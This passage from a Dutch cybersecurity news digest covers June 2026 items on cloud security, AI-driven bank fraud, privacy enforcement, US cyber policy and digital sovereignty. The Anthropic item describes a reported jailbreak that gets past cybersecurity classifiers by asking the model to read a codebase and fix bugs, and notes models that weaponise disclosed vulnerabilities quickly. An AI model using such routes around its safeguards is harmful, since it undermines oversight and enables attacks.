Uit het rapport komen diverse belangrijke punten naar voren. Fragmentatie vormt een aanzienlijke belemmering, met 69% van de organisaties die de wildgroei aan tools en het gebrek aan inzicht als de voornaamste beperkende factor noemen. Nu 88% van de organisaties actief is in hybride of multi-cloudomgevingen, zijn risicosignalen steeds meer verspreid over niet-verbonden tools, consoles en telemetriebronnen, wat de gedeelde context beperkt die teams nodig hebben voor prioritering en respons.

Hoewel de uitgaven stijgen, blijft de volwassenheid achter. Cloudbeveiliging vertegenwoordigt nu gemiddeld 34% van de IT-beveiligingsbudgetten, en 62% van de organisaties verwacht dat de budgetten voor cloudbeveiliging de komende twaalf maanden zullen toenemen. Desondanks beoordeelt 59% hun cloudbeveiligingspositie nog steeds als minder volwassen, wat aantoont dat de capaciteitswinst achterblijft bij de investeringen. Automatisering blijft voornamelijk door alerts gestuurd; slechts 11% van de organisaties meldt volledig autonome herstelworkflows, terwijl 37% afhankelijk is van basisautomatisering die alerts en aanbevelingen genereert. Door AI gestuurde detectie bevindt zich nog in een vroeg stadium, met slechts 18% die dit volledig operationeel heeft in hun omgevingen.

Beveiligingsleiders reageren door hun architecturen te heroverwegen. Op de vraag hoe zij hun cloudbeveiligingsstrategie zouden opbouwen als zij vandaag opnieuw zouden beginnen, gaf 64% aan te kiezen voor een platform van één leverancier dat netwerk-, cloud- en applicatiebeveiliging verenigt. Dit staat tegenover 27% die zou vasthouden aan een best-of-breed benadering met afzonderlijke puntoplossingen. De bevindingen wijzen op een trend naar uniforme beveiligingsarchitecturen die inzicht consolideren, telemetrie verbinden, een gedeelde risicocontext creëren en teams helpen te handelen voordat blootstelling leidt tot een compromis.

 

Bron: Cybersecurity Insiders

11 juni 2026 | Belgische banken uiten grote bezorgdheid over door AI gedreven fraude en stijgende verliezen

Een recente internationale enquête onthult een groeiende alarmbel onder Belgische bankleiders over een significante toename van fraudeverliezen, voornamelijk aangedreven door kunstmatige intelligentie (AI). Maar liefst 95 procent van de Belgische respondenten verwacht een verdere stijging van deze verliezen, waarbij met name niet geautoriseerde fraude als een grote bedreiging wordt beschouwd. Wereldwijd maken financiële instellingen zich ernstige zorgen over de impact van AI op fraudecriminaliteit.

Dit blijkt uit een omvangrijk onderzoek onder 1.440 professionals uit de bankensector, verspreid over 25 landen. Belgische deelnemers behoren tot de meest bezorgde groep, aangezien zij een snelle toename waarnemen in zowel de frequentie als de kwaliteit van frauduleuze activiteiten. Agenten met AI worden door de ondervraagden gezien als de grootste kwetsbaarheid voor de bankensector in het komende jaar. 84 procent van de respondenten wereldwijd noemt deze technologie als hun grootste zorg. In België gaven alle ondervraagden aan in 2026 een toename van fraudepogingen te hebben geconstateerd, een scherpe stijging ten opzichte van de 67 procent van vorig jaar. Dit plaatst België in de voorhoede van markten met de hoogste bezorgdheid.

De financiële implicaties zijn reeds merkbaar. In België rapporteert 95 procent van de bankleiders een toename van fraudeverliezen, een aanzienlijke stijging vergeleken met de 73 procent van vorig jaar. Ter vergelijking, in Nederland is een stijging tot 55 procent waargenomen. Als reactie hierop investeren Belgische banken steeds meer in fraudepreventie, deels om hun klantenbestand te behouden. In de Benelux doet 58 procent van de banken dit, terwijl het wereldwijde gemiddelde op 39 procent ligt.

AI leidt niet alleen tot een stijging van het aantal fraudepogingen, maar bemoeilijkt ook het onderscheid tussen legitieme en frauduleuze transacties. Meer dan de helft van de Belgische respondenten verwacht dat dit onderscheid in de toekomst nog uitdagender zal worden. Bovendien groeit de bezorgdheid over de snelheid waarmee fraude plaatsvindt, wat de dringende behoefte aan realtime informatie onderstreept. 85 procent van de respondenten acht het verkrijgen van directe gegevens over ontvangende rekeningen cruciaal voor een snellere detectie en bestrijding van fraude.

 

Bron: BioCatch | Bron 2: itdaily.com

11 juni 2026 | Belastingdienst stopt met BSN in betalingen na kritiek Autoriteit Persoonsgegevens

De Nederlandse Belastingdienst zal het burgerservicenummer (BSN) niet langer opnemen in betalingskenmerken en vorderingsnummers. Deze aanpassing volgt op een onderzoek van de Autoriteit Persoonsgegevens (AP), die concludeerde dat de huidige praktijk een overtreding vormt van de Algemene Verordening Gegevensbescherming (AVG) en de Uitvoeringswet AVG (UAVG).

De fiscus gebruikte tot voor kort het BSN van burgers in de kenmerken van zowel betalingen als vorderingen. Deze betaalkenmerken werden in specifieke gevallen gedeeld met derde partijen, waaronder banken, betaaldienstverleners of individuen die namens een belastingschuldige of belanghebbende een betaling uitvoerden of ontvingen. Hierdoor kwam het BSN van burgers ook bij deze externe partijen terecht.

Naar aanleiding van klachten van burgers over deze werkwijze stelde de Autoriteit Persoonsgegevens een onderzoek in. De toezichthouder oordeelde dat er sprake was van oneigenlijk gebruik van het BSN en dat de verwerking van dit nummer in de betreffende context niet noodzakelijk was. De Belastingdienst heeft de geconstateerde overtredingen vorig jaar reeds erkend.

De AP heeft de Belastingdienst verzocht om de overtredingen te staken, een verzoek waaraan de fiscus gehoor zal geven. Volgens de planning zullen uiterlijk eind 2026 alle nieuwe betalingskenmerken geen BSN meer bevatten. Het gebruik van het BSN in vorderingsnummers zal naar verwachting uiterlijk in 2032 volledig worden stopgezet. De Autoriteit Persoonsgegevens heeft ingestemd met deze planning, mede omdat de risico's voor burgers als beheersbaar worden beschouwd.

De toezichthouder heeft in zijn overwegingen meegenomen dat de Belastingdienst reeds diverse verbetertrajecten moet uitvoeren in verband met andere door de AP geconstateerde problemen, zoals kwesties rond geautomatiseerde selectie en de controle op de logging. De risico's voor burgers zijn bij deze andere problemen groter, waardoor de oplossing ervan een hogere prioriteit heeft. Desondanks benadrukt de AP dat het essentieel is dat de Belastingdienst de gestelde planningen haalt, om zo de risico's voor burgers bij de verwerking van het BSN maximaal te beperken en omdat de verwerking van het BSN in betaalkenmerken niet noodzakelijk is.

 

Bron: Autoriteit Persoonsgegevens | Bron 2: rijksoverheid.nl

12 juni 2026 | Senaat wijst voorstel voor Amerikaanse Cyber Force af

Een voorstel om een Amerikaanse Cyber Force op te richten als de nieuwste militaire tak van het land is deze week nipt afgewezen. Een amendement, ingediend door senator Kirsten Gillibrand (D-NY), dat de digitale dienst zou creëren, werd met 14 tegen 13 stemmen verworpen door de Senaatscommissie voor Strijdkrachten. De stemming vond plaats achter gesloten deuren tijdens de behandeling van het bijna 1,2 biljoen dollar kostende wetsvoorstel voor het nationale defensiebeleid voor fiscaal 2027. Negen Democraten en vier Republikeinen stemden voor het amendement, aldus anonieme congresbronnen.

Het belangrijkste argument tegen het voorstel was dat beleidsmakers de resultaten van een haalbaarheidsstudie naar de oprichting van een Cyber Force, uitgevoerd door de National Academy of Sciences, Engineering, and Medicine (NASEM), zouden moeten afwachten. Deze studie, die eveneens door Gillibrand werd bepleit, wordt later dit jaar verwacht. De verrassend nipte stemuitslag in de commissie is opmerkelijk, aangezien het Congres de mogelijkheid van een Cyber Force nog niet diepgaand heeft bestudeerd. Het illustreert de tweeledige frustratie op Capitol Hill over het aanhoudende falen van de bestaande militaire diensten om het Amerikaanse Cyber Command te voorzien van voldoende en goed voorbereid personeel om online buitenlandse tegenstanders zoals China en Rusland te bestrijden.

Senator Mike Rounds (R-SD), voorzitter van de cyber-subcommissie van de Senaatscommissie voor Strijdkrachten, verklaarde dat men nog niet zeker is of dit het juiste moment is, verwijzend naar de NASEM-studie en de veranderende aard van het aanpakken van beveiligingskwesties rondom cyber, waarbij kunstmatige intelligentie een belangrijke rol speelt. Eerder deze maand publiceerde een onafhankelijke commissie een rapport waarin gedetailleerd werd uiteengezet hoe de VS te werk zou moeten gaan bij de toekomstige oprichting van een zevende militaire tak. Deze nieuwe, geüniformeerde tak zou naar schatting 11 miljard dollar kosten en ongeveer 33.000 militairen tellen, waarvan 20.000 actief. Algemeen werd aangenomen dat Gillibrands amendement de aanbevelingen van deze commissie weerspiegelde, inclusief het onderbrengen van de Cyber Force binnen de landmacht, vergelijkbaar met de Space Force onder de luchtmacht. Een woordvoerder van Gillibrand liet weten optimistisch te blijven over de Cyber Force en dat de senator zal blijven aandringen op de oprichting ervan.

Hoewel de Cyber Force niet werd opgenomen in het omvangrijke wetsvoorstel, bevat het wel een ingrijpende reorganisatie van de cyberkantoren van het Ministerie van Defensie. Het wetsvoorstel voorziet in de creatie van een nieuwe functie: Under Secretary of Defense for Cyber, Information, and Networks. Deze persoon zal een 'dubbele pet' dragen als zowel de Chief Information Officer (CIO) van het Pentagon als de belangrijkste cyberadviseur van de Secretary of Defense. Deze bepaling, die over twee jaar in werking treedt, is een poging van wetgevers om de aanhoudende spanningen tussen de CIO en de assistent-secretaris van Defensie voor cyberbeleid voor te zijn. De kern van het conflict lag in een meningsverschil over wat precies onder cyberoperaties valt. De assistent-secretaris claimde dat dergelijke inspanningen statutair tot zijn kantoor behoorden, terwijl de CIO de activiteiten gelijkstelde aan cybersecurity in het algemeen, waardoor het de verantwoordelijkheid van haar organisatie werd. De nieuwe functie moet de frictie tussen deze twee rollen minimaliseren en cyber naar een hoger niveau tillen.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

12 juni 2026 | Zuid-Koreaanse winkelgigant Coupang beboet met 354 miljoen euro na datalek

De Zuid-Koreaanse winkelgigant Coupang is door de Zuid-Koreaanse privacytoezichthouder PIPC beboet met omgerekend 354 miljoen euro wegens een omvangrijk datalek. Dit is de hoogste boete die de autoriteit ooit heeft opgelegd. Het datalek, dat eind vorig jaar aan het licht kwam, omvatte de gegevens van ruim 37 miljoen mensen.

Gedurende meerdere maanden werden namen, e-mailadressen, telefoonnummers, bezorgadressen en bestelgeschiedenis buitgemaakt. Aangezien Zuid-Korea bijna 52 miljoen inwoners telt, heeft dit datalek ongeveer 71 procent van de bevolking geraakt. Volgens de PIPC was de oorzaak van het lek een ernstig gebrek aan beveiliging bij Coupang, inclusief nalatigheid op het gebied van toegangscontrole en de behandeling van authenticatiesleutels.

De totale boete bestaat uit twee delen, 423,6 miljard won voor het datalek zelf en 201 miljard won (omgerekend ruim 110 miljoen euro) voor het zonder toestemming verzamelen van activiteitsgegevens van ruim 11 miljoen klanten. Deze gegevens, waaronder URL's van bezochte websites of gebruikte apps, datum, tijd en IP-adres, werden verzameld wanneer klanten websites en apps van derde partijen bezochten waar advertenties van Coupang werden weergegeven. Daarnaast kreeg dochterbedrijf Coupang Fulfillment Service een aparte boete van 248 miljoen won, omgerekend ongeveer 145.000 euro, voor het onrechtmatig verwerken van klantgegevens.

De totale boetes vertegenwoordigen circa 1,4 procent van de jaaromzet van Coupang in 2025. De privacytoezichthouder heeft het bedrijf ook verplicht om diverse beveiligingsmaatregelen te implementeren om toekomstige datalekken te voorkomen. Eerder had Coupang al 1 miljard euro aan kortingsbonnen aangeboden aan de slachtoffers van het datalek. Een voormalige medewerker wordt verdacht van betrokkenheid bij het incident.

 

Bron: Zuid-Koreaanse privacytoezichthouder PIPC

12 juni 2026 | Minister ziet Nextcloud als mogelijk alternatief voor Microsoft 365

Minister Heerma van Binnenlandse Zaken heeft aangegeven dat Nextcloud, een opensource-samenwerkingsomgeving voor onder meer tekstverwerking, documentdeling, e-mailintegratie en online vergaderen, een geschikt alternatief kan vormen voor Microsoft 365. Deze uitspraak bevestigt eerdere bevindingen van de Algemene Rekenkamer, die eveneens de potentiële bijdrage van Nextcloud aan meer digitale soevereiniteit op langere termijn onderschreef.

De aanleiding voor de ministeriële verklaring waren vragen vanuit de vaste commissie voor Binnenlandse Zaken van de Tweede Kamer, gesteld naar aanleiding van een rapport van de Algemene Rekenkamer. In dit rapport werd belicht dat DICTU en SSC-ICT, twee overheidsinstanties die verantwoordelijk zijn voor de levering van ICT-diensten aan de overheid, lopend onderzoek uitvoeren naar Nextcloud. Centraal in dit onderzoek staat de vraag of opensource oplossingen als autonoom alternatief kunnen bijdragen aan de bestaande softwarevoorzieningen van de overheid. De Rekenkamer concludeerde dat Nextcloud op termijn een rol kan spelen in het vergroten van de digitale soevereiniteit.

In zijn reactie op de vragen van de commissie legde minister Heerma uit dat Nextcloud een suite van producten omvat die een alternatief kan bieden voor de functionaliteiten van Microsoft 365. Hij benadrukte het opensource karakter van het platform. De grotere ICT-dienstverleners van het Rijk hebben de opdracht gekregen om gezamenlijk een soevereine digitale werkplek te ontwikkelen. Hierbij wordt specifiek gekeken naar Nextcloud als een potentieel onderdeel van deze complete digitale werkomgeving.

De minister merkte verder op dat er momenteel onderzoek plaatsvindt naar de wijze waarop de benodigde financiering voor deze ontwikkelingen kan worden vormgegeven. Daarnaast wordt aandacht besteed aan de ervaringen die zijn opgedaan bij andere Europese initiatieven, zoals de samenwerking tussen Frankrijk en Duitsland op dit vlak. Minister Heerma sloot af met de mededeling dat de te ontwikkelen overheidsbrede soevereine clouddienst zich in eerste instantie richt op de realisatie van een containerplatform. Dit platform zal dienen voor het hosten van applicaties voor de Nederlandse overheid en wordt zo ontworpen dat het technologisch geschikt is om onderdelen van de digitale werkomgeving, waaronder Nextcloud, te huisvesten op de soevereine clouddienst. Dit proces is gericht op het versterken van de onafhankelijkheid en de controle over de digitale infrastructuur van de Nederlandse overheid.

 

Bron: nextcloud.com | Bron 2: rijksictdashboard.nl | Bron 3: freeipa.org

12 juni 2026 | D9+ landen eisen strengere EU regels voor online veiligheid kinderen

Een groep van kleinere Europese Unie-landen, bekend als de D9+-groep, heeft de Europese Commissie formeel verzocht om algemene regels op te stellen voor de online veiligheid van kinderen. Deze oproep richt zich specifiek op de onveiligheid, dreigingen en het "afval" dat via sociale media platforms wordt verspreid. De D9+-groep, bestaande uit digitale voorlopers, stuurde afgelopen maandag een brief aan de Commissie, waarin de dringende behoefte aan een gemeenschappelijke aanpak wordt benadrukt.

De landen die deel uitmaken van deze coalitie zijn onder meer Nederland, België, Denemarken, Estland, Ierland, Luxemburg, Polen, Portugal, Slovenië, Spanje, Tsjechië, Zweden en Finland. Zij constateren dat, hoewel in verschillende landen binnen Europa een vergelijkbare roep om strengere regulering klinkt, de reactie van de Commissie tot dusver traag en gefragmenteerd is geweest. Nederland, bijvoorbeeld, wacht momenteel af op beslissingen uit Brussel, die echter uitblijven.

Naast de algemene veiligheidsregels, pleit de D9+-groep ook voor een grondig onderzoek naar de haalbaarheid van een gemeenschappelijke, EU-brede leeftijdsgrens voor de toegang tot sociale media. Dit initiatief heeft tot doel een consistent beleid te creëren dat kinderen beter beschermt tegen schadelijke inhoud en interacties online.

Dit voorstel wordt echter niet zonder kritiek ontvangen. Er is een groep experts die bezorgdheid uit over de mogelijke implicaties van dergelijke regels voor de persoonlijke levenssfeer. Argumenten worden aangevoerd dat het bepalen wie wel of niet toegang krijgt tot een bepaalde applicatie, direct ingrijpt op de privacy van individuen. Een dergelijke regel zou identificatie aan de poort verplicht stellen, wat effectief betekent dat niemand meer echt anoniem gebruik kan maken van een dienst. Dit dilemma tussen bescherming van kinderen en het behoud van privacy en anonimiteit vormt een belangrijk discussiepunt in de bredere context van digitale regulering binnen de Europese Unie. De discussie over de balans tussen deze belangen zal naar verwachting verder gevoerd worden binnen de Europese Commissie.

 

Bron: Euractiv

12 juni 2026 | Bestuurders benadrukken cyberweerbaarheid operationele technologie als directieverantwoordelijkheid

De Cyber Security Raad organiseerde onlangs, in samenwerking met FME, het Nationaal Cyber Security Centrum (NCSC) en de Rijksinspectie voor Digitale Infrastructuur (RDI), een bestuurlijk diner gericht op operationele technologie (OT). Twintig topbestuurders uit de overheid, het toezicht en het bedrijfsleven kwamen bijeen om de cyberweerbaarheid van OT te bespreken. De kernboodschap van de avond was duidelijk. De cyberweerbaarheid van operationele technologie is geen IT vraagstuk of oefening voor compliance, maar een bestuurlijke verantwoordelijkheid die gedrag, samenwerking en ketenafspraken omvat.

Operationele technologie omvat de cruciale systemen die productie, energie, logistiek en infrastructuur aansturen, en vormt daarmee het hart van de fysieke economie. De toenemende connectiviteit van machines, het realtime uitlezen van data en het op afstand uitvoeren van onderhoud door leveranciers, heeft geleid tot een diepe vervlechting van IT en OT. Hoewel dit de efficiëntie vergroot, neemt ook het aanvalsoppervlak toe. Ingeborg Kortekaas van Vattenfall lichtte toe hoe geopolitieke afhankelijkheden, langere levertijden en vendor lock-in de keten complexer en kwetsbaarder maken, waardoor een incident bij één toeleverancier directe gevolgen kan hebben voor de continuïteit verderop in de keten.

De discussie benadrukte dat wetgeving zoals de NIS2-richtlijn en de Cyber Resilience Act weliswaar een belangrijke impuls geven, maar slechts een vertrekpunt vormen en niet de eindbestemming. Eindeloze vragenlijsten voor due diligence bieden geen afdoende waarborgen, en meervoudige audits in verschillende landen leiden tot duplicatie. De aanwezigen pleitten voor de verankering van security en weerbaarheid in sectorpacten, die bottom-up vanuit de praktijk moeten worden ontwikkeld. Toezicht kan hierop voortbouwen, niet als een cultuur van vinkjes zetten, maar als een gezamenlijk contract met ruimte voor handhaving en het belonen van goed gedrag. Certificering onder CSA2 biedt in dit kader de mogelijkheid om de huidige lappendeken van overlappende kaders te reduceren tot één Europees kader.

Maarten Timmermans van Awareways wees op de onderschatte rol van houding en gedrag, die minstens zo bepalend zijn als technische maatregelen. Effectieve strategieën omvatten beloningssystemen die goed gedrag zichtbaar maken, het verlagen van technische drempels en het creëren van zichtbaarheid, zodat het onderwerp op de werkvloer leeft. Er werd tevens gewaarschuwd voor doorgeslagen druk, die kan leiden tot risicoaversie of verminderd vertrouwen in technologie. Het streven is naar meer technische geletterdheid en een cultuur waarin experimenteren met veiligheid mogelijk is.

Een ander urgent thema was de positie van MKB bedrijven. Deze bedrijven zijn een integraal onderdeel van de ketens die beschermd moeten worden, maar beschikken over beperktere middelen en minder toegang tot kennis. Grote bedrijven, branches zoals FME en de overheid dragen een gezamenlijke verantwoordelijkheid om het MKB hierin mee te nemen, met uitvoerbare stappen die aansluiten op hun schaal en realiteit. Deelnemers keken terug op een leerzame en inspirerende avond.

 

Bron: FME

13 juni 2026 | U.S. beveelt Anthropic om toegang tot geavanceerde AI modellen voor buitenlanders te blokkeren

De Amerikaanse overheid heeft techbedrijf Anthropic bevolen de toegang tot haar meest geavanceerde kunstmatige intelligentie (AI)-modellen, Claude Fable 5 en Mythos 5, voor alle buitenlandse onderdanen op te schorten, zowel binnen als buiten de VS. Anthropic heeft vrijdag aangekondigd dat het de toegang tot deze modellen "abrupt zal uitschakelen" na de ontvangen instructie, daarbij verwijzend naar nationale veiligheidsbezwaren.

Anthropic ontving de instructie om 17:21 uur ET en gaf aan te geloven dat er sprake is van een "misverstand". Het bedrijf werkt eraan om de toegang zo snel mogelijk te herstellen. De exportcontrolerichtlijn heeft geen invloed op de toegang tot andere modellen van Anthropic.

Volgens Anthropic is het de overtuiging van de overheid dat er een methode is ontdekt om Fable 5 te "jailbreaken". Anthropic heeft een demonstratie van deze specifieke techniek beoordeeld, waarbij een klein aantal eerder bekende, kleine kwetsbaarheden werd geïdentificeerd. Het bedrijf merkt op dat deze kwetsbaarheden relatief eenvoudig lijken en dat andere publiekelijk beschikbare modellen deze ook kunnen ontdekken zonder een bypass nodig te hebben.

Deze onverwachte maatregel volgt slechts enkele dagen na de lancering van Claude Fable 5 en Mythos 5. Mythos 5, dat dezelfde onderliggende modelarchitectuur gebruikt maar met minder strenge veiligheidsmaatregelen op bepaalde gebieden zoals cybersecurity, wordt beschreven als het model met de "sterkste cybersecurity-capaciteiten ter wereld". Dit model blijft toegankelijk voor een geverifieerde groep cyberverdedigers en operators van kritieke infrastructuur.

Anthropic benadrukt dat het "sterke" veiligheidsmechanismen heeft geïmplementeerd om misbruik van zijn modellen voor cybersecurity-gerelateerde taken te voorkomen. Dit omvat een reeks veiligheidsclassificaties die worden gebruikt om potentieel misbruik, inclusief jailbreakpogingen, te detecteren en het hoofdmodel te verbieden te reageren. De cybersecurity-classificatie is ontworpen om schadelijke 'single-turn' verzoeken met betrekking tot het plannen van een cyberaanval, het ontwikkelen van exploits of het ontwijken van verdediging te blokkeren. Mythos-klasse modellen zijn echter bedreven in het vinden en exploiteren van softwarekwetsbaarheden, wat aanvallers een strategisch voordeel kan geven.

Vorige week onthulde Anthropic dat zijn Mythos-klasse model in staat is om recent bekendgemaakte softwarekwetsbaarheden binnen uren, en soms zelfs minuten, om te zetten in werkende exploits, in plaats van weken. Dit suggereert dat geavanceerde AI modellen even goed kunnen zijn in het snel bewapenen van publiekelijk bekendgemaakte kwetsbaarheden. Het Red Team van Anthropic stelde dat een enkele operator nu in staat is om de patches van een maand om te zetten in werkende exploits in één middag, voor een paar duizend dollar en zonder gespecialiseerde expertise. Dit betekent dat het huidige patchbeleid van softwareontwikkelaars, met maandelijkse releases en gefaseerde uitrol over meerdere weken, mogelijk niet langer toereikend is.

De bescherming van Fable 5 betekent dat vragen over cybersecurity-onderwerpen worden beantwoord door Claude Opus 4.8, het op een na meest capabele model van het bedrijf. In zijn meest recente verklaring betoogde Anthropic dat er tot op heden geen universele jailbreakmethoden zijn ontwikkeld tegen de nieuwste modellen. Het bedrijf voegde eraan toe dat zowel interne als externe red-teaming oefeningen hebben aangetoond dat de beveiligingsmaatregelen "aanzienlijk effectiever zijn dan die van enig eerder ingezet model".

Verder claimde Anthropic dat "perfecte jailbreak-resistentie" niet mogelijk is voor welke modelprovider dan ook, aangezien elke beveiliging die door de industrie wordt gebruikt, vatbaar is voor niet-universele jailbreaks die "effectief zijn in zeer beperkte contexten of extra inspanning vereisen om aan elke nieuwe situatie te worden aangepast".

Anthropic gaf aan dat de overheid slechts mondeling bewijs heeft geleverd van een potentiële, beperkte, niet-universele jailbreak, die in essentie bestaat uit het vragen aan het model om een specifieke codebase te lezen en eventuele softwarefouten te herstellen. Het bedrijf heeft een rapport beoordeeld waarvan het gelooft dat dit de basis is van de overheidsrichtlijn en heeft gevalideerd dat het niveau van de getoonde capaciteit breed beschikbaar is via andere modellen (waaronder OpenAI's GPT-5.5) en dagelijks wordt gebruikt door verdedigers die systemen veilig houden.

Anthropic merkte ook op dat hoewel het voorstander is van overheidsmaatregelen om onveilige AI-implementaties te blokkeren, de ontdekking van een "beperkte potentiële jailbreak" geen reden zou moeten zijn om een commercieel model dat breed wordt ingezet, terug te roepen. Het wettelijke proces moet "transparant, eerlijk, duidelijk en gebaseerd zijn op technische feiten", aldus het bedrijf.

Eerder dit jaar bestempelde het Amerikaanse ministerie van Defensie Anthropic als een "supply chain risk" nadat de maker van Claude rode lijnen wilde trekken met betrekking tot het militaire gebruik van zijn technologie. Het bedrijf heeft twee rechtszaken aangespannen om deze aanwijzing te blokkeren.

 

Bron: Anthropic

13 juni 2026 | Amerikaans surveillanceprogramma dreigt te vervallen na wetgevende impasse

Een controversiële Amerikaanse surveillancewet, bekend als Sectie 702 van de Foreign Intelligence Surveillance Act (FISA), dreigt te vervallen na het mislukken van wetgevende pogingen om deze te verlengen. Dit is de eerste keer sinds de invoering in 2008 dat het programma, dat Amerikaanse inlichtingendiensten in staat stelt digitale communicatie van buitenlanders overzee te verzamelen zonder bevelschrift, dreigt te stoppen. De impasse in het Congres en het Witte Huis heeft geleid tot het potentiële verlies van toegang tot cruciale nationale veiligheidsinformatie.

Wetgevers hebben maandenlang geprobeerd tot een akkoord te komen dat zowel voorvechters van privacy als burgerrechten zou tevredenstellen. De Senaat naderde een wetsvoorstel dat op brede steun kon rekenen, maar de onderhandelingen liepen vorige week vast toen president Donald Trump de federale huisvestingsfunctionaris Bill Pulte aankondigde als waarnemend directeur van nationale inlichtingen. Pulte, zonder militaire of inlichtingenervaring, had eerder bekendheid verworven door critici van de president te beschuldigen van hypotheekfraude. Deze benoeming zorgde voor woede bij Democraten en verraste de Republikeinen.

Pogingen van het Huis van Afgevaardigden en de Senaat om een kortetermijnverlenging van Sectie 702 snel goed te keuren, faalden voordat leden met reces gingen. Uiteindelijk stelde Trump Jay Clayton voor als de volgende permanente inlichtingendirecteur. Clayton, een federale districtsrechter in New York en voormalig voorzitter van de Securities and Exchange Commission, werd positief ontvangen door belangrijke Democraten, waaronder senator Mark Warner. Warner benadrukte echter dat er een duidelijke garantie moest zijn dat Pulte niet als waarnemend directeur zou optreden voordat de Senaat een FISA-verlenging in overweging zou nemen. De inlichtingencommissie heeft Clayton's bevestigingshoorzitting gepland voor volgende week, en de meerderheidsleider in de Senaat, John Thune, heeft aangegeven de bevestiging zo snel mogelijk te willen afhandelen.

Ondanks het dreigende verval zal het surveillanceprogramma niet onmiddellijk volledig worden stopgezet. In maart heeft een inlichtingenrechtbank het FISA-programma goedgekeurd om nog een jaar door te gaan, wat waarschijnlijk betekent dat bestaande 702-bevelen van kracht blijven, maar dat de regering geen nieuwe kan aanvragen. Deze interpretatie kan echter nog in de rechtbank worden aangevochten. Een belangrijke onbeantwoorde vraag is of grote Amerikaanse communicatieproviders zouden stoppen met het naleven van gerechtelijke bevelen onder Sectie 702 als de vrijwaring wegvalt. Senator Warner merkte op dat telecommunicatiebedrijven doorgaans meewerken zolang zij schadeloosstelling ontvangen. Bij de vorige verlenging in 2024 hadden twee dienstverleners de National Security Agency (NSA) geïnformeerd dat zij uit het programma zouden stappen als het zou vervallen.

Jon Darby, voormalig directeur operaties van de NSA, betreurde de uitkomst en stelde dat de bevoegdheid van Sectie 702 de basis vormt van veel van de belangrijkste buitenlandse inlichtingen van de Verenigde Staten. Hij noemde het laten vervallen van de autoriteit "onverantwoordelijk en gevaarlijk" en waarschuwde voor minder inzicht in bedreigingen van landen als Iran, China, Rusland en terroristen. Jake Laperruque, adjunct-directeur van het Security and Surveillance Project van het Center for Democracy and Technology, beschreef het verval als een "onvergeeflijke mislukking" van het leiderschap in het Congres, veroorzaakt door het weigeren van stemmingen over hervormingen. Hoewel lopende operaties volgens hem niet direct veranderen, benadrukte hij de noodzaak om de wet aan te pakken.

 

Bron: U.S. Congress | Bron 2: intelligence.senate.gov

13 juni 2026 | Britse toezichthouder beoordeelt privacy bij smart-tv's

De Britse privacytoezichthouder Information Commissioner's Office (ICO) heeft aangekondigd dit jaar te beoordelen of smart-tv's de privacywetgeving naleven. De focus ligt op de manier waarop deze apparaten omgaan met de persoonlijke gegevens van gebruikers. Volgens de ICO hebben smart-tv's de capaciteit om aanzienlijke hoeveelheden data te verzamelen, die vervolgens kunnen worden ingezet voor gerichte advertenties. De toezichthouder benadrukt dat dergelijke praktijken alleen zijn toegestaan indien deze transparant gebeuren en met expliciete, 'echte' toestemming van de gebruiker.

De ICO heeft aangegeven dit jaar te zullen beoordelen of fabrikanten van smart-tv's zich houden aan de wettelijke bepalingen en of zij gebruikers een zinvolle keuze bieden met betrekking tot het gebruik van hun verzamelde gegevens. Deze aankondiging volgt op de recente publicatie van aanbevelingen door de ICO voor fabrikanten van Internet of Things (IoT) apparaten. In deze aanbevelingen wordt onder meer gesteld dat privacy reeds in het ontwerpproces ('privacy by design') moet worden geïntegreerd, in plaats van achteraf als een add-on te worden toegevoegd. Verder adviseert de toezichthouder dat de veiligste instellingen standaard moeten zijn geactiveerd en dat alleen strikt noodzakelijke gegevens mogen worden verzameld.

De Britse actie vindt plaats tegen de achtergrond van vergelijkbare zorgen in de Verenigde Staten. Eind vorig jaar klaagde de Amerikaanse staat Texas vijf prominente fabrikanten van smart-tv's aan wegens het illegaal verzamelen van kijkgedrag van gebruikers. De betrokken bedrijven waren Sony, Samsung, LG, Hisense en TCL. Volgens de aanklacht verzamelden deze tv-fabrikanten onrechtmatig persoonlijke gegevens middels Automated Content Recognition (ACR)-technologie. In maart van dit jaar werd bekend dat Samsung in deze zaak een schikking had getroffen. De onderzoeken en juridische stappen onderstrepen de groeiende aandacht voor de privacy-implicaties van slimme apparaten en de noodzaak voor fabrikanten om transparant en conform de wetgeving te opereren.

 

Bron: Information Commissioner's Office

13 juni 2026 | Motie Tweede Kamer roept op tot minder afhankelijkheid onderwijs van Big Tech

De Nederlandse Tweede Kamer wordt verzocht om het onderwijs in Nederland minder afhankelijk te maken van Google, Microsoft en andere Big Tech bedrijven. PRO Kamerleden Moorman en Kathmann hebben hiertoe een motie ingediend, waarin zij stellen dat de totale dominantie van deze partijen een van de structurele oorzaken is van de huidige afhankelijkheid. Dit volgt op een recent debat in de Tweede Kamer over digitalisering en leermiddelen in het funderend onderwijs.

Kamerlid Moorman benadrukte tijdens het debat de grote dilemma's rond digitale leermiddelen. Zij uitte de zorg dat leerlingen 'merkkenners' worden in plaats van digitaal onafhankelijk en vaardig in het omgaan met technologie. Moorman pleitte tevens voor meer budget, aangezien de kwestie te belangrijk is om te negeren. Zij waarschuwde dat de afhankelijkheid van Big Tech kan leiden tot een onveilige omgeving voor leerlingen, die daardoor hun leven lang onveilig kunnen zijn.

Moorman wees erop dat andere landen, zoals Estland, Frankrijk en Taiwan, al actief bezig zijn met dit vraagstuk, terwijl Nederland tot op heden weinig actie onderneemt. Volgens het Kamerlid is het essentieel om meer grip te krijgen op Big Tech in het onderwijs. Indien de overheid afwacht, zal de markt de controle overnemen, wat resulteert in leerlingen die vooral 'gebruiksdeskundige' zijn van specifieke platforms in plaats van algemeen technisch onderlegd. Dit leidt volgens haar ook tot een enorme 'lock-in', waarvan het moeilijk is om weer los te komen.

De ingediende motie, opgesteld samen met PRO Kamerlid Kathmann, stelt het volgende: "Constaterende dat het kabinet een hoge ambitie heeft om de digitale autonomie van Nederland te vergroten in alle strategische sectoren; overwegende dat de totale dominantie van enkele niet-Europese techgiganten, zoals Microsoft en Google, in het funderend onderwijs een van de structurele oorzaken is van de huidige afhankelijkheid; verzoekt de regering om samen met het veld als doel te stellen om de digitale autonomie van het funderend onderwijs structureel en aantoonbaar te vergroten en hier samen plannen voor uit te werken." De Tweede Kamer moet nog stemmen over deze motie.

 

Bron: Tweede Kamer | Bron 2: youtu.be

13 juni 2026 | Microsoft lost Windows updatefouten via WUSA-installer op

